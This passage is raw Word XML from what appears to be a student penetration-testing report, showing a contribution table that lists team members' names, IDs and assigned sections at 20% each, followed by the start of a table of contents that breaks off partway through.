              <w:t xml:space="preserve">Infrastructure Exploitation and Brute-Force Attacks </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73A56BB8" w14:textId="752E424B" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00B769CC" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA1B85" w:rsidRPr="00097425" w14:paraId="1A88E3B6" w14:textId="77777777" w:rsidTr="00213762">
        <w:trPr>
          <w:trHeight w:val="526"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD21252" w14:textId="6C1007F1" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="008C7882" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>8398112</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6215B20C" w14:textId="76F519B6" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="008C7882" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Hriday Pradeep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="755C6387" w14:textId="18BDCBFD" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="009608CD" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Network Traffic Analysis and Credential Leakage Audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="746324D5" w14:textId="3F4E0249" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00B769CC" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA1B85" w:rsidRPr="00097425" w14:paraId="682F9C1E" w14:textId="77777777" w:rsidTr="00213762">
        <w:trPr>
          <w:trHeight w:val="507"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1885" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="109478FD" w14:textId="39CCCBBD" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00213762" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>8935166</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AF23A68" w14:textId="4DA3AF33" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00213762" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Sibi Varghese</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29B77FF9" w14:textId="6B17354C" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="009608CD" w:rsidP="00D23F0B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F96906">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Application Exploitation and Defensive Mitigations </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FB54546" w14:textId="583CDE1C" w:rsidR="00AA1B85" w:rsidRPr="00097425" w:rsidRDefault="00B769CC" w:rsidP="00213762">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00097425">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52CE051D" w14:textId="77777777" w:rsidR="00097425" w:rsidRDefault="00097425" w:rsidP="00126BB8">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A49CB1D" w14:textId="77777777" w:rsidR="00F96906" w:rsidRDefault="00F96906" w:rsidP="00126BB8">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4A32BA" w14:textId="77777777" w:rsidR="00F96906" w:rsidRDefault="00F96906" w:rsidP="00126BB8">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380479D5" w14:textId="77777777" w:rsidR="009608CD" w:rsidRDefault="009608CD" w:rsidP="00126BB8">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC1EB2C" w14:textId="77777777" w:rsidR="00F96906" w:rsidRDefault="00F96906" w:rsidP="00126BB8">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A8E3F9" w14:textId="77777777" w:rsidR="00097425" w:rsidRDefault="00097425" w:rsidP="00126BB8">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-AE" w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-1648585275"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="132CD7EF" w14:textId="44CEDC19" w:rsidR="00F11EBA" w:rsidRPr="00126BB8" w:rsidRDefault="00F11EBA">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00126BB8">
            <w:rPr>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0F4A8103" w14:textId="520CBCC2" w:rsidR="005F415B" w:rsidRDefault="00F11EBA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00097425">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00097425">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00097425">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc231851421" w:history="1">
            <w:r w:rsidR="005F415B" w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Title &amp; Abstract</w:t>
            </w:r>
            <w:r w:rsidR="005F415B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005F415B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005F415B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851421 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005F415B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005F415B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005F415B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005F415B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38441AA5" w14:textId="48415772" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851422" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851422 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27BEFB84" w14:textId="45918CF6" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851423" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851423 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64C3CD0B" w14:textId="64CEAB7A" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851424" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Target Environment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851424 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="469E13E2" w14:textId="658F80F1" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851425" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851425 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="396DACBA" w14:textId="72B7A699" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851426" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Footprinting and Reconnaissance</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851426 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F883D6D" w14:textId="4AC70690" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851427" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network Traffic Capturing &amp; Analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851427 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68A960FA" w14:textId="34E1DB96" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-US" w:eastAsia="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231851428" w:history="1">
            <w:r w:rsidRPr="00A0097F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scanning, Enumeration, and Vulnerability Identification</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231851428 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5000D459" w14:textId="1409371F" w:rsidR="005F415B" w:rsidRDefault="005F415B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
